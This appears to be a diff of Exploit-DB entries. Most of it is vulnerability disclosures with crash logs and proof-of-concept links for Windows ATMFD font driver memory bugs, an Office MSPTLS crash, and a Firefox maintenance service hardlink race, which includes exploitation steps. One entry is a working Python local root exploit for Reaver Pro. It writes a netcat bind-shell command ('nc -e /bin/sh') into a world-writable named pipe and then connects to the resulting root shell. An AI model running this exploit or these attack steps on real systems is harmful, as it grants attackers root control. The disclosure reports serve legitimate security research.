97ff9d14 76ee70f4 020101c3 000000c0 00000040 nt!KiSystemServicePostCall
002cf224 00000000 00000000 00000000 00000000 ntdll!KiFastSystemCallRet
---
The crash represents a read from invalid memory; prior to being dereferenced as an address, the ESI register is loaded with a value from EAX+0x30 (on 32-bit Windows), which points into an "Adbe" pool allocation:
---
0: kd> !pool 9d619018
Pool page 9d619018 region is Paged session pool
9d619000 is not a valid large pool allocation, checking large session pool...
*9d619000 : large page allocation, Tag is Adbe, size is 0x4018 bytes
Pooltag Adbe : Adobe's font driver
---
The surrounding code is a loop over a linked list of structures; the ESI register at the time of the crash holds a [F/B]link address which points to unmapped memory, potentially suggesting that the root cause of the crash is a use-after-free condition, or some kind of corruption of the linked list. Since the invalid address is later used to manipulate memory, we expect that this issue could be used to achieve remote code execution in the security context of the Windows kernel.
Moreover, we have also encountered similar crashes one instruction further in the code - in these cases, ESI turned out to accidentally point to mapped memory, but its contents did not correspond to the ATMFD's expectations (reinforcing the use-after-free hypothesis), thus resulting in an attempt to dereference a completely wild memory address, e.g.:
---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: eebd8451, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: 9205440e, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000002, (reserved)
---
The issue reproduces on Windows 7 and 8.1. It is easiest to reproduce with Special Pools enabled for ATMFD.DLL (leading to an immediate crash when the bug is triggered), but it should also be possible to observe a crash on a default Windows installation in ATMFD.DLL.
Note that this crash is very similar in its nature to Issue 383 (invalid memory access while traversing a linked list of "Adbe" structures); however, due to uncertainty about the reason of the crash and the different stack traces, I am filing this as a separate report for now.
Attached is an archive with six proof of concept font files (three for each crash location) together with corresponding kernel crash logs.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37921.zip

164
platforms/windows/dos/37922.txt Executable file
View file

@ -0,0 +1,164 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=383&can=1
We have encountered a Windows kernel crash in the ATMFD.DLL OpenType driver while processing a corrupted OTF font file:
---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: ff67a024, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: 98b54072, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)
Debugging Details:
------------------
*** ERROR: Module load completed but symbols could not be loaded for ATMFD.DLL
READ_ADDRESS: ff67a024 Paged session pool
FAULTING_IP:
ATMFD+34072
98b54072 8b700c mov esi,dword ptr [eax+0Ch]
MM_INTERNAL_CODE: 0
IMAGE_NAME: ATMFD.DLL
DEBUG_FLR_IMAGE_TIMESTAMP: 54e6a55a
MODULE_NAME: ATMFD
FAULTING_MODULE: 98b20000 ATMFD
DEFAULT_BUCKET_ID: WIN7_DRIVER_FAULT
BUGCHECK_STR: 0x50
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 2
ANALYSIS_VERSION: 6.3.9600.17237 (debuggers(dbg).140716-0327) x86fre
TRAP_FRAME: 9d793d9c -- (.trap 0xffffffff9d793d9c)
ErrCode = 00000000
eax=ff67a018 ebx=fbea4830 ecx=00000000 edx=00000000 esi=fbffe7c0 edi=fbffe7c0
eip=98b54072 esp=9d793e10 ebp=9d793e38 iopl=0 nv up ei pl nz na po nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010202
ATMFD+0x34072:
98b54072 8b700c mov esi,dword ptr [eax+0Ch] ds:0023:ff67a024=????????
Resetting default scope
LAST_CONTROL_TRANSFER: from 82714ce7 to 826b02d8
STACK_TEXT:
9d7938ec 82714ce7 00000003 8d6243ee 00000065 nt!RtlpBreakWithStatusInstruction
9d79393c 827157e5 00000003 00000000 00002522 nt!KiBugCheckDebugBreak+0x1c
9d793d00 826c3391 00000050 ff67a024 00000000 nt!KeBugCheck2+0x68b
9d793d84 82675c48 00000000 ff67a024 00000000 nt!MmAccessFault+0x104
9d793d84 98b54072 00000000 ff67a024 00000000 nt!KiTrap0E+0xdc
WARNING: Stack unwind information not available. Following frames may be wrong.
9d793e38 98b4d5b5 fbffe7c0 fbea4830 00000f5c ATMFD+0x34072
9d794544 98b4f6e0 fbbfac70 98b5f028 9d794790 ATMFD+0x2d5b5
9d794600 98b427ae fbbfac70 98b5f028 9d794790 ATMFD+0x2f6e0
9d7946ec 98b42858 fbbfac70 9d794790 9d794814 ATMFD+0x227ae
9d794718 98b332b2 fbbfac70 98b5f028 9d794790 ATMFD+0x22858
9d79487c 98b33689 0000000b 9d79499c fad3ef00 ATMFD+0x132b2
9d7948d0 98b2406d 0000000b 9d79499c 00000000 ATMFD+0x13689
9d794924 9888dcf2 ff7a5010 fad30cf0 00000001 ATMFD+0x406d
9d79496c 988767cb ff7a5010 fad30cf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e
9d7949e0 988a1513 ffa6a130 fb23bd40 0000134b win32k!xInsertMetricsRFONTOBJ+0x9c
9d794a14 988a35f5 00000020 9d794aec 9d794c8a win32k!RFONTOBJ::bGetGlyphMetrics+0x131
9d794cb8 988b6684 0c010385 00001360 00000040 win32k!GreGetCharABCWidthsW+0x147
9d794d14 82672a66 0c010385 00001340 00000040 win32k!NtGdiGetCharABCWidthsW+0xf8
9d794d14 772b70f4 0c010385 00001340 00000040 nt!KiSystemServicePostCall
0017ed34 00000000 00000000 00000000 00000000 ntdll!KiFastSystemCallRet
---
The crash represents a read from invalid memory; prior to being dereferenced as an address, the EAX register is loaded with a value from ESI+0x34 (on 32-bit Windows), which points into an "Adbe" pool allocation:
---
kd> !pool fbffe7c0
Pool page fbffe7c0 region is Special pool
Address fbffe000 does not belong to any pool
*fbffe000 size: 898 data: fbffe768 (Paged session) *Adbe
Pooltag Adbe : Adobe's font driver
---
The crash is always caused by an attempt to access memory at a constant offset past the memory page boundary (0x24 on 32-bit platforms), and the surrounding code is a loop over a linked list of structures. The EAX register at the time of the crash holds a [F/B]link address which points to unmapped memory, potentially suggesting that the root cause of the crash is a use-after-free condition, or some kind of corruption of the linked list. Since the invalid address is later used to manipulate memory, we expect that this issue could be used to achieve remote code execution in the security context of the Windows kernel.
The issue reproduces on Windows 7 and 8.1. It is easiest to reproduce with Special Pools enabled for ATMFD.DLL (leading to an immediate crash when the bug is triggered), but it should also be possible to observe a crash on a default Windows installation in ATMFD.DLL.
Attached is an archive with a proof of concept font file together with a corresponding kernel crash log.
------------------------------------------------------------------------------------------------------------------------------------------
We have also encountered a number of crashes where the read operation discussed above succeeds (moving the contents of [eax+0Ch] to esi), and a respective attempt to access the [esi+34h] address fails a few instructions later; for example:
---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: fffb8034, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: 9486407b, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)
Debugging Details:
------------------
Could not read faulting driver name
READ_ADDRESS: GetPointerFromAddress: unable to read from 8278184c
Unable to read MiSystemVaType memory at 82760f00
fffb8034
FAULTING_IP:
ATMFD+3407b
9486407b 394e34 cmp dword ptr [esi+34h],ecx
MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT
BUGCHECK_STR: 0x50
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 0
LAST_CONTROL_TRANSFER: from 9485d5b5 to 9486407b
STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
879d7e38 9485d5b5 fba78880 fbbb6830 00000f5c ATMFD+0x3407b
879d8544 9485f6e0 fbad2c70 9486f028 879d8790 ATMFD+0x2d5b5
879d8600 948527ae fbad2c70 9486f028 879d8790 ATMFD+0x2f6e0
879d86ec 94852858 fbad2c70 879d8790 879d8814 ATMFD+0x227ae
879d8718 948432b2 fbad2c70 9486f028 879d8790 ATMFD+0x22858
879d887c 94843689 00000002 879d899c fbafaf58 ATMFD+0x132b2
879d88d0 9483406d 00000002 879d899c 00000000 ATMFD+0x13689
879d8924 9499dce2 ff7af010 fc01acf0 00000001 ATMFD+0x406d
879d896c 949867bb ff7af010 fc01acf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e
879d89e0 949b14d7 ffa66130 ff646084 0000201c win32k!xInsertMetricsRFONTOBJ+0x9c
879d8a14 949b35b9 00000020 879d8bfc 879d8cac win32k!RFONTOBJ::bGetGlyphMetrics+0x131
879d8cb8 949c6644 10010188 00002020 00000040 win32k!GreGetCharABCWidthsW+0x147
879d8d14 82654896 10010188 00002000 00000040 win32k!NtGdiGetCharABCWidthsW+0xf8
879d8d14 776f70f4 10010188 00002000 00000040 nt!KiSystemServicePostCall
001bf3e4 00000000 00000000 00000000 00000000 0x776f70f4
---
Attached are further three samples together with corresponding crash log files, which reproduce the issue at the ATMFD+0x3407b location.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37922.zip

91
platforms/windows/dos/37923.txt Executable file
View file

@ -0,0 +1,91 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=382&can=1
We have encountered a number of Windows kernel crashes in the ATMFD.DLL OpenType driver while processing corrupted OTF font files, such as:
---
DRIVER_PAGE_FAULT_BEYOND_END_OF_ALLOCATION (d6)
N bytes of memory was allocated and more than N bytes are being referenced.
This cannot be protected by try-except.
When possible, the guilty driver's name (Unicode string) is printed on
the bugcheck screen and saved in KiBugCheckDriver.
Arguments:
Arg1: ffb4da9f, memory referenced
Arg2: 00000000, value 0 = read operation, 1 = write operation
Arg3: 92a7a902, if non-zero, the address which referenced memory.
Arg4: 00000000, (reserved)
Debugging Details:
------------------
READ_ADDRESS: ffb4da9f Special pool
FAULTING_IP:
ATMFD+2a902
92a7a902 0fb600 movzx eax,byte ptr [eax]
MM_INTERNAL_CODE: 0
IMAGE_NAME: ATMFD.DLL
DEBUG_FLR_IMAGE_TIMESTAMP: 54e6a55a
MODULE_NAME: ATMFD
FAULTING_MODULE: 92a50000 ATMFD
DEFAULT_BUCKET_ID: WIN7_DRIVER_FAULT
BUGCHECK_STR: 0xD6
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 2
ANALYSIS_VERSION: 6.3.9600.17237 (debuggers(dbg).140716-0327) x86fre
TRAP_FRAME: 945bcd54 -- (.trap 0xffffffff945bcd54)
ErrCode = 00000000
eax=ffb4da9f ebx=945bd0ec ecx=ffb4da9f edx=ffb4dea8 esi=945bd2fc edi=00002932
eip=92a7a902 esp=945bcdc8 ebp=945bd4c0 iopl=0 nv up ei pl nz na po nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010202
ATMFD+0x2a902:
92a7a902 0fb600 movzx eax,byte ptr [eax] ds:0023:ffb4da9f=??
Resetting default scope
LAST_CONTROL_TRANSFER: from 82723ce7 to 826bf2d8
STACK_TEXT:
945bc8a4 82723ce7 00000003 46aca596 00000065 nt!RtlpBreakWithStatusInstruction
945bc8f4 827247e5 00000003 00000000 00000002 nt!KiBugCheckDebugBreak+0x1c
945bccb8 826d2391 00000050 ffb4da9f 00000000 nt!KeBugCheck2+0x68b
945bcd3c 82684c48 00000000 ffb4da9f 00000000 nt!MmAccessFault+0x104
945bcd3c 92a7a902 00000000 ffb4da9f 00000000 nt!KiTrap0E+0xdc
WARNING: Stack unwind information not available. Following frames may be wrong.
945bd4c0 92a7f6e0 fab90c70 92a8f028 945bd70c ATMFD+0x2a902
945bd57c 92a727ae fab90c70 92a8f028 945bd70c ATMFD+0x2f6e0
945bd668 92a72858 fab90c70 945bd70c 945bd790 ATMFD+0x227ae
945bd694 92a632b2 fab90c70 92a8f028 945bd70c ATMFD+0x22858
945bd7f8 92a63689 0000000b 945bd918 fb64c8b0 ATMFD+0x132b2
945bd84c 92a5406d 0000000b 945bd918 fb64c8b0 ATMFD+0x13689
945bd8a0 92badcf2 ff7a5010 fa4f4cf0 00000001 ATMFD+0x406d
945bd8e8 92bb3784 ff7a5010 fa4f4cf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e
945bd960 92c2bdcd 945bdc3c fb665704 fb64c8b0 win32k!xInsertMetricsPlusRFONTOBJ+0x120
945bd990 92ba5964 00000003 ff7bf020 945bdcd4 win32k!RFONTOBJ::bGetGlyphMetricsPlus+0x179
945bd9c8 92c2b8cb 945bdc1c 945bdc3c 00000008 win32k!ESTROBJ::vCharPos_H3+0xf0
945bda0c 92ba55e7 945bdcd0 00000003 945bdc1c win32k!ESTROBJ::vInit+0x268
945bdc2c 92ba57aa 00000000 945bdcd0 fa4f4cf0 win32k!GreGetTextExtentExW+0x12a
945bdd0c 82681a66 20010483 00b20b1c 00000003 win32k!NtGdiGetTextExtentExW+0x141
945bdd0c 773c70f4 20010483 00b20b1c 00000003 nt!KiSystemServicePostCall
0031f6d4 00000000 00000000 00000000 00000000 ntdll!KiFastSystemCallRet
---
The memory read instruction causing the crash is responsible for fetching the next CharString instruction from the input stream, in order to execute it as part of the PostScript state machine. This bug is similar to issue 174 , which described the lack of the instruction pointer's bounds checking in the interpreter function, making it possible to crash the operating system or potentially disclose chunks of kernel-mode memory. While that problem was fixed in bulletin MS15-021 by introducing the missing bound checks, out-of-bounds access to the instruction stream is still possible as shown in the above crash log. The exact root cause of the vulnerability is unknown.
The issue reproduces on Windows 7. It is easiest to reproduce with Special Pools enabled for ATMFD.DLL (leading to an immediate crash when the bug is triggered), but it might also possible to observe a crash on a default Windows installation, depending on the specific testcase used.
Attached is an archive with two proof of concept font files together with corresponding kernel crash logs.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37923.zip

58
platforms/windows/dos/37924.txt Executable file
View file

@ -0,0 +1,58 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=431&can=1
The following crash was observed in Microsoft Office 2007 with Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug also reproduced in Office 2010 running on Windows 7 x86.
The crash is caused by a 1 bit delta from the original file at offset 0xA9B0. Standard tools did not identify anything significant about this offset in the minimized file.
Attached files:
Fuzzed minimized PoC: 3423415565_min.doc
Fuzzed non-minimized PoC: 3423415565_crash.doc
Original non-fuzzed file: 3423415565_orig.doc
DLL Versions:
wwlib.dll: 12.0.6720.5000
msptls.dll: 12.0.6682.5000
Observed Crash:
eax=0000b69a ebx=0e370fb8 ecx=0e431ee8 edx=0e433fc0 esi=abcdbbbb edi=fffffffe
eip=6bdd9ddf esp=00129c58 ebp=00129c9c iopl=0 nv up ei pl nz na pe cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010207
MSPTLS!LssbFIsSublineEmpty+0xa327:
6bdd9dc4 83e808 sub eax,8
6bdd9dc7 4f dec edi
6bdd9dc8 3930 cmp dword ptr [eax],esi
6bdd9dca 7ff8 jg MSPTLS!LssbFIsSublineEmpty+0xa30c (6bdd9dc4)
6bdd9dcc 897ddc mov dword ptr [ebp-24h],edi
6bdd9dcf 8bc7 mov eax,edi
6bdd9dd1 6bc01c imul eax,eax,1Ch
6bdd9dd4 03c8 add ecx,eax
6bdd9dd6 8b7118 mov esi,dword ptr [ecx+18h]
6bdd9dd9 8945d4 mov dword ptr [ebp-2Ch],eax
6bdd9ddc 8b04fa mov eax,dword ptr [edx+edi*8]
=> 6bdd9ddf 8b5670 mov edx,dword ptr [esi+70h] ds:0023:abcdbc2b=????????
0:000> kb
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00129c9c 6bdda05b 02000000 00129cb0 0e370fa0 MSPTLS!LssbFIsSublineEmpty+0xa327
00129cb8 6bdd481c 0e370fb8 00129d04 00129d48 MSPTLS!LssbFIsSublineEmpty+0xa5a3
00129cf8 6bde528a 0019f4cd 0019f4cd 00000000 MSPTLS!LssbFIsSublineEmpty+0x4d64
00129d70 6bde54c2 0e186fa0 00129dc8 0012a038 MSPTLS!LssbFIsSublineEmpty+0x157d2
00129d98 6bddf354 02996ec0 00129f14 0e186fa0 MSPTLS!LssbFIsSublineEmpty+0x15a0a
00129f9c 6bdc4b85 02990320 000002d4 0019f4cd MSPTLS!LssbFIsSublineEmpty+0xf89c
00129fd0 312dbeea 02990320 000002d4 0019f4cd MSPTLS!LsCreateLine+0x23
0012a044 312dba15 02a33088 0ca8c9c0 000002d4 wwlib!FMain+0x97933
0012a0ac 312db45a 0af2cf30 0e811fe8 000002d4 wwlib!FMain+0x9745e
0012a19c 6be51b27 0af2cf30 0cb10fb0 01cccb78 wwlib!FMain+0x96ea3
0012a23c 6be6a137 00000000 0e811fe8 0ccccb78 MSPTLS!FsDestroyMemory+0x1ee4e
0012a310 6be6d6f8 00000000 00000033 00000000 MSPTLS!FsDestroyMemory+0x3745e
We can see that esi has an application verifier heap chunk canary value used at the start of allocated chuncks. Clearly we've indexed somewhere we shouldn't be. In this case we can see that esi came from [ecx+18h] and ecx was moved backwards in memory due to the negative value in edi. These pointers are used later on in the vulnerable function to write data leading to memory corruption.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37924.zip

23
platforms/windows/local/37898.py Executable file
View file

@ -0,0 +1,23 @@
source: http://www.securityfocus.com/bid/55725/info
Reaver Pro is prone to a local privilege-escalation vulnerability.
A local attacker may exploit this issue to execute arbitrary code with root privileges. Successful exploits may result in the complete compromise of affected computers.
#!/usr/bin/env python
import os
print """
Reaver Pro Local Root
Exploits a hilarious named pipe flaw.
The named pipe /tmp/exe is open to anyone...
Any command echoed into it gets ran as root.
This simply launches a bindshell on 4444...
Insecurety Research | insecurety.net
"""
print ""
print "This is why TacNetSol should hire me?"
print "[+] Sending command to named pipe..."
cmd = '''echo "nc -e /bin/sh -lvvp 4444" >> /tmp/exe'''
os.system(cmd)
print "[+] Connecting to bind shell, enjoy root!"
os.system("nc -v localhost 4444")

43
platforms/windows/local/37925.txt Executable file
View file

@ -0,0 +1,43 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=427&can=1
Mozilla Maintenance Service: Log File Overwrite Elevation of Privilege
Platform: Windows
Version: Mozilla Firefox 38.0.5
Class: Elevation of Privilege
Summary:
The maintenance service creates a log file in a user writable location. Its possible to change the log file to a hardlink to another file to cause file corruption or elevation of privilege.
Description:
When the maintenance service starts it creates a log file under c:\programdata\mozilla\logs. This is done in maintenanceservice.cpp/SvcMain. This directory it creates the file in has fairly permissive permissions which allows a normal user to create new files underneath that directory. Its possible to race the creation of the log file during the service initialization to drop a hardlink to an existing file on the same drive (which is probably the system drive) which when opened by the maintenance service running as local system will cause the file to be overwritten by the log data.
At the very least this would corrupt the target file, however as the user has some control over bits of the contents, such as the updater path, its possible to get some user controlled contents in there. This might be used to elevate privileges by overwriting a script file which has a permissive parser, such as powershell, batch or HTA which subsequently gets executed by a privileged process.
The only slight difficulty in exploitation is that the user cannot directly delete the log file to replace it with a hardlink. However this isnt a significant issue as before opening the log file the service backs up the log to a new name leaving the directory entry for “maintenanceservice.log” free. Therefore theres a race condition between the log file being moved out of the way and the new log file being created.
So to exploit this you perform the following operations:
1. Start a thread which creates a hard link in the log directory to the file you want to overwrite. Repeat until successful.
2. In another thread start the service passing the arbitrary content you want to insert as the path to the updater file
A similar vulnerability exists in the update.status handling, for example in WriteStatusFailure which will write update.status to any location you specify. You can use a hardlink to force the file to be overwritten. In this case this would only cause file corruption as the user has no real control on the contents.
If I could recommend fixes either make the logs directory writable only by administrators or use CopyFile instead of MoveFile when backing up the previous logs. I would not recommend trying to do anything like inspecting the file for hardlinks or similar.
Proof of Concept:
Ive attached a proof of concept, its written in C#. Youll need to compile it with the C# csc compiler. NOTE: you might need to run this on a multi-core machine to stand a chance of winning the race.
1) Compile the PoC
2) Execute the PoC passing the name of a file you want to overwrite on the command line
3) Program should run and print Done if successful
Expected Result:
The log file is created as normal
Observed Result:
The target file has been overwritten with the contents of the log file
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37925.zip